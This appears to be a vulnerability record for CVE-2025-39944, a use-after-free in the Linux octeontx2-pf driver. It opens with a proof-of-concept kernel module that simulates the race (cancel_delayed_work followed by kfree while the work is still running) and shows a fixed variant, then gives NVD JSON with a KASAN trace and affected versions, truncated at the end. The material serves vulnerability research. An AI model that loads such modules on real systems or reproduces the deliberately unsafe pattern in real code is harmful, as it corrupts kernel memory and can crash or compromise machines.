CVE-2025-39944

// CVE-2025-39944 PoC - Use-After-Free in octeontx2-pf otx2_sync_tstamp() // This PoC demonstrates the race condition by simulating the bug in a test environment // Note: The actual exploitation requires access to OcteonTX2 hardware or QEMU emulation #include <linux/module.h> #include <linux/kernel.h> #include <linux/workqueue.h> #include <linux/slab.h> #include <linux/delay.h> // Simulated otx2_ptp structure struct otx2_ptp { int dummy_data; struct delayed_work synctstamp_work; int ref_count; }; static struct otx2_ptp *ptp; // Simulated otx2_sync_tstamp() callback function static void otx2_sync_tstamp(struct work_struct *work) { struct otx2_ptp *ptp_ptr; ptp_ptr = container_of(work, struct otx2_ptp, synctstamp_work); // Simulate processing delay to increase race condition likelihood msleep(100); // USE-AFTER-FREE: Accessing ptp_ptr after it may have been freed printk(KERN_INFO "Accessing ptp->dummy_data: %d\n", ptp_ptr->dummy_data); ptp_ptr->ref_count++; } // Simulated otx2_ptp_destroy() - VULNERABLE version using cancel_delayed_work() static void otx2_ptp_destroy_vulnerable(void) { printk(KERN_INFO "otx2_ptp_destroy: calling cancel_delayed_work()\n"); cancel_delayed_work(&ptp->synctstamp_work); // Does NOT wait for completion! kfree(ptp); // Frees memory while work may still be running printk(KERN_INFO "otx2_ptp_destroy: freed ptp\n"); } // Simulated otx2_ptp_destroy() - FIXED version using cancel_delayed_work_sync() static void otx2_ptp_destroy_fixed(void) { printk(KERN_INFO "otx2_ptp_destroy: calling cancel_delayed_work_sync()\n"); cancel_delayed_work_sync(&ptp->synctstamp_work); // Waits for completion kfree(ptp); // Safe to free after work is fully cancelled printk(KERN_INFO "otx2_ptp_destroy: freed ptp safely\n"); } // Simulated otx2_ptp_init() static int otx2_ptp_init(void) { ptp = kmalloc(sizeof(struct otx2_ptp), GFP_KERNEL); if (!ptp) return -ENOMEM; ptp->dummy_data = 42; ptp->ref_count = 0; INIT_DELAYED_WORK(&ptp->synctstamp_work, otx2_sync_tstamp); // Schedule the periodic work schedule_delayed_work(&ptp->synctstamp_work, msecs_to_jiffies(10)); return 0; } static int __init poc_init(void) { printk(KERN_INFO "CVE-2025-39944 PoC module loaded\n"); otx2_ptp_init(); // Trigger the race condition msleep(50); // Let work start otx2_ptp_destroy_vulnerable(); // This triggers UAF return 0; } static void __exit poc_exit(void) { printk(KERN_INFO "CVE-2025-39944 PoC module unloaded\n"); } module_init(poc_init); module_exit(poc_exit); MODULE_LICENSE("GPL"); MODULE_DESCRIPTION("PoC for CVE-2025-39944 - UAF in octeontx2-pf otx2_sync_tstamp()");

{"cve": {"id": "CVE-2025-39944", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T08:15:47.480", "lastModified": "2026-04-06T13:31:16.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: Fix use-after-free bugs in otx2_sync_tstamp()\n\nThe original code relies on cancel_delayed_work() in otx2_ptp_destroy(),\nwhich does not ensure that the delayed work item synctstamp_work has fully\ncompleted if it was already running. This leads to use-after-free scenarios\nwhere otx2_ptp is deallocated by otx2_ptp_destroy(), while synctstamp_work\nremains active and attempts to dereference otx2_ptp in otx2_sync_tstamp().\nFurthermore, the synctstamp_work is cyclic, the likelihood of triggering\nthe bug is nonnegligible.\n\nA typical race condition is illustrated below:\n\nCPU 0 (cleanup) | CPU 1 (delayed work callback)\notx2_remove() |\n otx2_ptp_destroy() | otx2_sync_tstamp()\n cancel_delayed_work() |\n kfree(ptp) |\n | ptp = container_of(...); //UAF\n | ptp-> //UAF\n\nThis is confirmed by a KASAN report:\n\nBUG: KASAN: slab-use-after-free in __run_timer_base.part.0+0x7d7/0x8c0\nWrite of size 8 at addr ffff88800aa09a18 by task bash/136\n...\nCall Trace:\n <IRQ>\n dump_stack_lvl+0x55/0x70\n print_report+0xcf/0x610\n ? __run_timer_base.part.0+0x7d7/0x8c0\n kasan_report+0xb8/0xf0\n ? __run_timer_base.part.0+0x7d7/0x8c0\n __run_timer_base.part.0+0x7d7/0x8c0\n ? __pfx___run_timer_base.part.0+0x10/0x10\n ? __pfx_read_tsc+0x10/0x10\n ? ktime_get+0x60/0x140\n ? lapic_next_event+0x11/0x20\n ? clockevents_program_event+0x1d4/0x2a0\n run_timer_softirq+0xd1/0x190\n handle_softirqs+0x16a/0x550\n irq_exit_rcu+0xaf/0xe0\n sysvec_apic_timer_interrupt+0x70/0x80\n </IRQ>\n...\nAllocated by task 1:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n otx2_ptp_init+0xb1/0x860\n otx2_probe+0x4eb/0xc30\n local_pci_probe+0xdc/0x190\n pci_device_probe+0x2fe/0x470\n really_probe+0x1ca/0x5c0\n __driver_probe_device+0x248/0x310\n driver_probe_device+0x44/0x120\n __driver_attach+0xd2/0x310\n bus_for_each_dev+0xed/0x170\n bus_add_driver+0x208/0x500\n driver_register+0x132/0x460\n do_one_initcall+0x89/0x300\n kernel_init_freeable+0x40d/0x720\n kernel_init+0x1a/0x150\n ret_from_fork+0x10c/0x1a0\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 136:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x3f/0x50\n kfree+0x137/0x370\n otx2_ptp_destroy+0x38/0x80\n otx2_remove+0x10d/0x4c0\n pci_device_remove+0xa6/0x1d0\n device_release_driver_internal+0xf8/0x210\n pci_stop_bus_device+0x105/0x150\n pci_stop_and_remove_bus_device_locked+0x15/0x30\n remove_store+0xcc/0xe0\n kernfs_fop_write_iter+0x2c3/0x440\n vfs_write+0x871/0xd70\n ksys_write+0xee/0x1c0\n do_syscall_64+0xac/0x280\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n...\n\nReplace cancel_delayed_work() with cancel_delayed_work_sync() to ensure\nthat the delayed work item is properly canceled before the otx2_ptp is\ndeallocated.\n\nThis bug was initially identified through static analysis. To reproduce\nand test it, I simulated the OcteonTX2 PCI device in QEMU and introduced\nartificial delays within the otx2_sync_tstamp() function to increase the\nlikelihood of triggering the bug."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.154", "matchCriteriaId": "A57D06D5-F248-4BF0-8580-9873AB71028A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.108", "matchCriteriaId": "A7E8EAEE-7731-4996-9578-696255D61EA2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.49", "matchCriteriaId": "CAA033E9-A2C5-4976-A83E-9804D8FB827F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.16.9", "matchCriteriaId": "638DD910-1189-4F5E-98BF-2D436B695112"} ... (truncated)